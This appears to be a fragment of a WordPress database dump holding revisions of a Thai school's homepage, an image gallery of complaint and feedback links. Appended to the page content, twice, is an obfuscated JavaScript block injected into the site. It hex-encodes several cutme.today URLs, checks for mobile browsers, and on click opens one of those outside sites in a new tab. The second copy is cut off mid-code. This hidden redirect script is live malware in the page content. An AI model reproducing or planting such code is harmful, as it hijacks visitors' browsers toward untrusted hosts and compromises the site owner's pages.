{\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 10:00:55','2024-07-27 03:00:55','',14,'http://pakhaeng.ssk.in.th/?p=25',0,'revision','',0),
(26,1,'2024-07-27 10:01:06','2024-07-27 03:01:06','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const 